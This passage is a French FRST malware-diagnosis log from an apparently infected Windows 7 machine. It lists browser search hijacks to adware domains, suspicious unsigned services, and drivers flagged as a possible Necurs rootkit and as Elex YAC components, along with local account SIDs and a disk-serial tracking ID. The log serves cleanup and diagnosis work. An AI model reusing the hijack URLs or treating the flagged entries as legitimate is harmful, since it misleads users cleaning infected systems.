{EBB339DC-1EBA-4780-86FD-E7F0777E7421} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dmontlsfs_17_16¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyCyEtDtDyC0AtBtB0B0FyCyB0B0DtCyCtN0D0Tzu0StCzytAyEtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDtDyEyE0AtB0F0AtGtBzz0A0AtGyCyEyDtAtGyEyCzy0CtGtByCyCtCtByB0EyByEyB0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCzztAyDyCtBtA0FtGtDtC0FtCtGyEyCyBtDtGzzyBtAtDtG0AyE0DtC0D0AtCtB0F0CyEtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtByCzztA%26cr%3D1483230843%26a%3Dwbf_dmontlsfs_17_16%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms} SearchScopes: HKLM-x32 -> {f79e5d1c-5148-469e-9f98-a11d8d7863f4} URL = SearchScopes: HKLM-x32 -> {f7bb050c-e116-44da-89c2-6f2b68c54836} URL = SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000 -> DefaultScope {d4fee3d1-1014-4db8-a824-573bf9ab51c7} URL = SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-60b342da&q={searchTerms} SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000 -> {685F7985-5F85-491C-B3ED-336871ED398D} URL = hxxps://duckduckgo.com/?q={searchTerms}&atb=v61-7__ SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000 -> {76915921-B323-4F2D-A8A6-B7EB5D0E5E1E} URL = hxxps://duckduckgo.com/?q={searchTerms}&atb=v61-5__ SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000 -> {d4fee3d1-1014-4db8-a824-573bf9ab51c7} URL = SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000 -> {EBB339DC-1EBA-4780-86FD-E7F0777E7421} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492430446&z=e34f2e6c1e62c4671846348g6zft1o6zccbeczdzfq&from=che0812&uid=ST500DM002-1BD142_Z6EN4PT2XXXXZ6EN4PT2&q={searchTerms} SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000 -> {f79e5d1c-5148-469e-9f98-a11d8d7863f4} URL = SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000 -> {f7bb050c-e116-44da-89c2-6f2b68c54836} URL = SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926 -> DefaultScope {d4fee3d1-1014-4db8-a824-573bf9ab51c7} URL = SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-60b342da&q={searchTerms} SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926 -> {685F7985-5F85-491C-B3ED-336871ED398D} URL = hxxps://duckduckgo.com/?q={searchTerms}&atb=v61-7__ SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926 -> {76915921-B323-4F2D-A8A6-B7EB5D0E5E1E} URL = hxxps://duckduckgo.com/?q={searchTerms}&atb=v61-5__ SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926 -> {d4fee3d1-1014-4db8-a824-573bf9ab51c7} URL = SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926 -> {EBB339DC-1EBA-4780-86FD-E7F0777E7421} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492430446&z=e34f2e6c1e62c4671846348g6zft1o6zccbeczdzfq&from=che0812&uid=ST500DM002-1BD142_Z6EN4PT2XXXXZ6EN4PT2&q={searchTerms} SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926 -> {f79e5d1c-5148-469e-9f98-a11d8d7863f4} URL = SearchScopes: HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926 -> {f7bb050c-e116-44da-89c2-6f2b68c54836} URL = BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_101\bin\ssv.dll [2016-10-10] (Oracle Corporation) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.) BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-10-10] (Oracle Corporation) BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2017-01-10] (Intel Security) BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated) BHO-x32: Programme d’aide de l’Assistant de connexion au compte Microsoft -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.) Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2017-01-10] (Intel Security) StartMenuInternet: IEXPLORE.EXE - iexplore.exe FireFox: ======== FF ProfilePath: C:\Users\BOB\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\yJ3k3GIn.default\Profiles\yJ3k3GIn.default [non trouvé(e)] <==== ATTENTION FF ProfilePath: C:\Users\BOB\AppData\Roaming\Mozilla\Firefox\Profiles\yJ3k3GIn.default [2017-03-02] FF Extension: (Avira Browser Safety) - C:\Users\BOB\AppData\Roaming\Mozilla\Firefox\Profiles\yJ3k3GIn.default\Extensions\abs@avira.com [2016-10-06] [Legacy] FF SearchPlugin: C:\Users\BOB\AppData\Roaming\Mozilla\Firefox\Profiles\yJ3k3GIn.default\searchplugins\ayj9qk09.xml [2017-03-02] FF SearchPlugin: C:\Users\BOB\AppData\Roaming\Mozilla\Firefox\Profiles\yJ3k3GIn.default\searchplugins\vp3vxz8c.xml [2017-04-01] FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2017-04-02] () FF Plugin: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-10-10] (Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-10-10] (Oracle Corporation) FF Plugin: @microsoft.com/GENUINE -> disabled [Pas de fichier] FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2017-04-02] () FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-09] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-09] (Intel Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Pas de fichier] FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2012-09-23] (Adobe Systems Inc.) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems) StartMenuInternet: FIREFOX.EXE - firefox.exe Chrome: ======= CHR HomePage: Default -> msn.com CHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1495127541&from=e8d90518&uid=st500dm002-1bd142_z6en4pt2xxxxz6en4pt2&z=93c702ab07d5c0e40029dedg9z6tbw8g2obm0w9zae" CHR DefaultSearchURL: Default -> hxxp://www.luckysearch123.com/search.php?type=ds&ts=1495127541&from=e8d90518&uid=st500dm002-1bd142_z6en4pt2xxxxz6en4pt2&z=93c702ab07d5c0e40029dedg9z6tbw8g2obm0w9zae&q={searchTerms} CHR DefaultSearchKeyword: Default -> luck CHR Profile: C:\Users\BOB\AppData\Local\Google\Chrome\User Data\Default [2017-12-30] CHR Extension: (Google Slides) - C:\Users\BOB\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-04] CHR Extension: (Google Docs) - C:\Users\BOB\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-04-05] CHR Extension: (Google Drive) - C:\Users\BOB\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-04-04] CHR Extension: (YouTube) - C:\Users\BOB\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-04-04] CHR Extension: (Bing) - C:\Users\BOB\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2017-04-04] CHR Extension: (Protection Web Avira) - C:\Users\BOB\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-04-04] CHR Extension: (Google Docs hors connexion) - C:\Users\BOB\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-04] CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\BOB\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-04-04] CHR Extension: (Gmail) - C:\Users\BOB\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-04] CHR Extension: (Chrome Media Router) - C:\Users\BOB\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-04] CHR HKLM\...\Chrome\Extension: [bpmmandcadflhnnaiclipadomfmdbjbp] - CHR HKLM\...\Chrome\Extension: [ehlceeijggpdgfcefmipcmdelickjgfg] - CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - CHR HKLM\...\Chrome\Extension: [pbofdmdkmmhmgmiecoaofbgfdahcdflp] - CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bpmmandcadflhnnaiclipadomfmdbjbp] - CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ehlceeijggpdgfcefmipcmdelickjgfg] - CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pbofdmdkmmhmgmiecoaofbgfdahcdflp] - CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bpmmandcadflhnnaiclipadomfmdbjbp] - CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ehlceeijggpdgfcefmipcmdelickjgfg] - CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - CHR HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pbofdmdkmmhmgmiecoaofbgfdahcdflp] - CHR HKLM-x32\...\Chrome\Extension: [bpmmandcadflhnnaiclipadomfmdbjbp] - CHR HKLM-x32\...\Chrome\Extension: [ehlceeijggpdgfcefmipcmdelickjgfg] - CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [olojcnagmcbplpdddabmpfehhlleobpb] - CHR HKLM-x32\...\Chrome\Extension: [pbofdmdkmmhmgmiecoaofbgfdahcdflp] - Opera: ======= OPR Extension: (stefanvd) - C:\Users\BOB\AppData\Roaming\Opera Software\Opera Stable\Extensions\ccbdoklfbpcifppcfahmmpmbkfdjjccm [2017-05-24] OPR Extension: (uBlock Origin) - C:\Users\BOB\AppData\Roaming\Opera Software\Opera Stable\Extensions\kccohkcpppjjkkjppopfnflnebibpida [2017-06-12] OPR Extension: (Adblock Plus) - C:\Users\BOB\AppData\Roaming\Opera Software\Opera Stable\Extensions\oidhhegpmlfpoeialbgcdocjalghfpkp [2017-05-12] StartMenuInternet: (HKLM) OperaStable - C:\Program Files\Opera\Launcher.exe ==================== Services (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) "24ca7e6b7f2b5486" => service n'a pas pu être déverrouillé. <==== ATTENTION R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated) R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2257016 2017-08-23] (Adobe Systems, Incorporated) S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1530376 2017-05-25] () R2 DDVCollectorSvcApi; C:\Program Files\Dell\DellDataVault\DDVCollectorSvcApi.exe [208760 2017-07-27] (Dell Inc.) R2 DDVDataCollector; C:\Program Files\Dell\DellDataVault\DDVDataCollector.exe [3294584 2017-07-27] (Dell Inc.) R2 DDVRulesProcessor; C:\Program Files\Dell\DellDataVault\DDVRulesProcessor.exe [217464 2017-07-27] (Dell Inc.) R2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [97616 2017-01-11] (Dell) S2 DellDataVault; C:\Program Files\Dell\DellDataVault\DellDataVault.exe [2572024 2016-03-11] (Dell Inc.) R2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [230248 2017-05-01] (Dell Inc.) S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1471168 2017-02-06] (Disc Soft Ltd) S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [526376 2017-12-30] (EasyAntiCheat Ltd) R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [14696 2013-07-30] (Intel Corporation) S2 Installer; C:\Users\BOB\AppData\Local\Temp\ds93_l\DisplayService.exe [8192 2017-04-21] () [Fichier non signé] <==== ATTENTION R2 Intel(R) Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Fichier non signé] S3 Intel(R) Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation) R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda) <==== ATTENTION R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-09] (Intel Corporation) R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes) R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [246488 2013-06-19] (Realtek Semiconductor) R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [2020240 2015-01-23] (SoftThinks SAS) S2 SkypeUpdate; C:\Program Files (x86)\Skype\Updater\Updater.exe [317408 2017-07-18] () [Fichier non signé] R2 SupportAssistAgent; C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [41432 2017-11-30] (Dell Inc.) R2 TMCheckVersion; C:\Windows\SysWow64\TMhardware.dll [467240 2017-08-09] () R2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [995800 2017-01-05] (McAfee, Inc.) R2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [16248 2017-01-05] (McAfee, Inc.) S3 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [86864 2017-01-05] (McAfee, Inc.) R2 wiasvc; C:\ProgramData\Microsoft\Windows\Image\capCADF.tmp:ad [212994 ] () [Fichier non signé] <==== ATTENTION <==== ATTENTION U4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-10-09] (Microsoft Corporation) S3 BstHdAndroidSvc; "C:\Program Files (x86)\BlueStacks\HD-Service.exe" BstHdAndroidSvc Android [X] S3 BstHdLogRotatorSvc; "C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe" [X] S3 BstHdPlusAndroidSvc; "C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe" BstHdPlusAndroidSvc Android [X] S2 Ds3Service; "C:\Users\BOB\Desktop\MANETTE PS3 SUR PC\ScpServer\bin\ScpService.exe" [X] S2 InstallerService; C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe [X] ===================== Pilotes (Avec liste blanche) ====================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) S3 216752DE; C:\Windows\system32\drivers\216752DE.sys [255928 2017-12-29] (Malwarebytes) U5 24ca7e6b7f2b5486; C:\Windows\System32\Drivers\24ca7e6b7f2b5486.sys [75208 2017-08-09] () <==== ATTENTION Necurs Rootkit? R2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [314016 2017-03-02] () S3 DDDriver; C:\Windows\System32\drivers\DDDriver64Dcsa.sys [32960 2017-07-27] (Dell Inc.) S3 DellProf; C:\Windows\System32\drivers\DellProf.sys [32568 2017-07-27] (Dell Computer Corporation) R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2017-02-24] (Disc Soft Ltd) R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2017-02-24] (Disc Soft Ltd) R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2013-07-24] (Intel Corporation) R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43680 2017-03-02] () S2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [193968 2017-12-31] (Malwarebytes) S3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [46008 2017-12-30] (Malwarebytes) R0 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2017-12-30] (Malwarebytes) R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [100312 2013-12-09] (Intel Corporation) R1 NetUtils2016; C:\Windows\system32\drivers\NetUtils2016.sys [909944 2017-04-01] () <==== ATTENTION S3 ql2300; C:\Windows\system32\drivers\ql2300.sys [1524816 2009-07-14] () [Fichier non signé] S3 ql40xx; C:\Windows\system32\drivers\ql40xx.sys [128592 2009-07-14] () [Fichier non signé] S3 QWAVEdrv; C:\Windows\system32\drivers\qwavedrv.sys [46592 2009-07-14] () [Fichier non signé] S3 RasAcd; C:\Windows\System32\DRIVERS\rasacd.sys [14848 2009-07-14] () [Fichier non signé] R3 RasAgileVpn; C:\Windows\System32\DRIVERS\AgileVpn.sys [60416 2009-07-14] () [Fichier non signé] R3 Rasl2tp; C:\Windows\System32\DRIVERS\rasl2tp.sys [129536 2010-11-21] () [Fichier non signé] R3 RasPppoe; C:\Windows\System32\DRIVERS\raspppoe.sys [92672 2009-07-14] () [Fichier non signé] R3 RasSstp; C:\Windows\System32\DRIVERS\rassstp.sys [83968 2009-07-14] () [Fichier non signé] R1 rdbss; C:\Windows\System32\DRIVERS\rdbss.sys [310272 2015-10-09] () [Fichier non signé] R3 rdpbus; C:\Windows\System32\DRIVERS\rdpbus.sys [24064 2009-07-14] () [Fichier non signé] R1 RDPCDD; C:\Windows\System32\DRIVERS\RDPCDD.sys [7680 2009-07-14] () [Fichier non signé] S3 RDPDR; C:\Windows\System32\drivers\rdpdr.sys [165888 2010-11-21] () [Fichier non signé] R1 RDPENCDD; C:\Windows\System32\drivers\rdpencdd.sys [7680 2009-07-14] () [Fichier non signé] R1 RDPREFMP; C:\Windows\System32\drivers\rdprefmp.sys [8192 2009-07-14] () [Fichier non signé] S3 RDPWD; C:\Windows\System32\Drivers\RDPWD.sys [212480 2014-07-17] () [Fichier non signé] R0 rdyboost; C:\Windows\System32\drivers\rdyboost.sys [213888 2010-11-21] () [Fichier non signé] R2 rspndr; C:\Windows\System32\DRIVERS\rspndr.sys [76800 2009-07-14] () [Fichier non signé] R3 RTL8167; C:\Windows\System32\DRIVERS\Rt64win7.sys [849992 2013-04-10] () [Fichier non signé] S3 s3cap; C:\Windows\system32\drivers\vms3cap.sys [6656 2010-11-21] () [Fichier non signé] S3 sbp2port; C:\Windows\system32\drivers\sbp2port.sys [103808 2010-11-21] () [Fichier non signé] S3 scfilter; C:\Windows\System32\DRIVERS\scfilter.sys [29696 2010-11-21] () [Fichier non signé] R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [39168 2013-05-19] () [Fichier non signé] S4 secdrv; C:\Windows\System32\Drivers\secdrv.sys [23040 2009-06-10] () [Fichier non signé] S4 secdrv; C:\Windows\SysWow64\Drivers\secdrv.sys [11973 2017-04-30] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [Fichier non signé] S3 Serenum; C:\Windows\system32\drivers\serenum.sys [23552 2009-07-14] () [Fichier non signé] S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-14] () [Fichier non signé] S3 sermouse; C:\Windows\system32\drivers\sermouse.sys [26624 2009-07-14] () [Fichier non signé] S3 sffdisk; C:\Windows\system32\drivers\sffdisk.sys [14336 2009-07-14] () [Fichier non signé] S3 sffp_mmc; C:\Windows\system32\drivers\sffp_mmc.sys [13824 2009-07-14] () [Fichier non signé] S3 sffp_sd; C:\Windows\system32\drivers\sffp_sd.sys [14336 2010-11-21] () [Fichier non signé] S3 sfloppy; C:\Windows\system32\drivers\sfloppy.sys [16896 2009-07-14] () [Fichier non signé] S3 SiSRaid2; C:\Windows\system32\drivers\SiSRaid2.sys [43584 2009-07-14] () [Fichier non signé] S3 SiSRaid4; C:\Windows\system32\drivers\sisraid4.sys [80464 2009-07-14] () [Fichier non signé] S3 Smb; C:\Windows\System32\DRIVERS\smb.sys [93184 2009-07-14] () [Fichier non signé] R0 spldr; C:\Windows\System32\Drivers\spldr.sys [19008 2009-07-14] () [Fichier non signé] R2 TMhardware; C:\Windows\system32\drivers\TMhardware.sys [220200 2017-03-08] () S3 TsUsbFlt; C:\Windows\System32\drivers\tsusbflt.sys [59392 2010-11-21] () [Fichier non signé] S3 TsUsbGD; C:\Windows\system32\drivers\TsUsbGD.sys [31232 2010-11-21] () [Fichier non signé] S3 tunnel; C:\Windows\System32\DRIVERS\tunnel.sys [125440 2010-11-21] () [Fichier non signé] S3 uagp35; C:\Windows\system32\drivers\uagp35.sys [64080 2009-07-14] () [Fichier non signé] S4 udfs; C:\Windows\System32\DRIVERS\udfs.sys [328192 2010-11-21] () [Fichier non signé] S3 uliagpkx; C:\Windows\system32\drivers\uliagpkx.sys [64592 2009-07-14] () [Fichier non signé] R3 umbus; C:\Windows\System32\DRIVERS\umbus.sys [48640 2010-11-21] () [Fichier non signé] S3 UmPass; C:\Windows\system32\drivers\umpass.sys [9728 2009-07-14] () [Fichier non signé] S3 usbaudio; C:\Windows\System32\drivers\usbaudio.sys [109824 2015-10-09] () [Fichier non signé] S3 usbccgp; C:\Windows\System32\DRIVERS\usbccgp.sys [99840 2016-08-16] () [Fichier non signé] S3 usbcir; C:\Windows\system32\drivers\usbcir.sys [100864 2015-10-09] () [Fichier non signé] R3 usbehci; C:\Windows\system32\drivers\usbehci.sys [56320 2016-08-16] () [Fichier non signé] R3 usbhub; C:\Windows\system32\drivers\usbhub.sys [343552 2016-08-16] () [Fichier non signé] S3 usbohci; C:\Windows\system32\drivers\usbohci.sys [25600 2016-08-16] () [Fichier non signé] S3 usbprint; C:\Windows\system32\drivers\usbprint.sys [25088 2009-07-14] () [Fichier non signé] R3 USBSTOR; C:\Windows\System32\DRIVERS\USBSTOR.SYS [91648 2016-02-03] () [Fichier non signé] S3 usbuhci; C:\Windows\system32\drivers\usbuhci.sys [30720 2016-08-16] () [Fichier non signé] R0 vdrvroot; C:\Windows\System32\drivers\vdrvroot.sys [36432 2009-07-14] () [Fichier non signé] S3 vga; C:\Windows\System32\DRIVERS\vgapnp.sys [29184 2009-07-14] () [Fichier non signé] R1 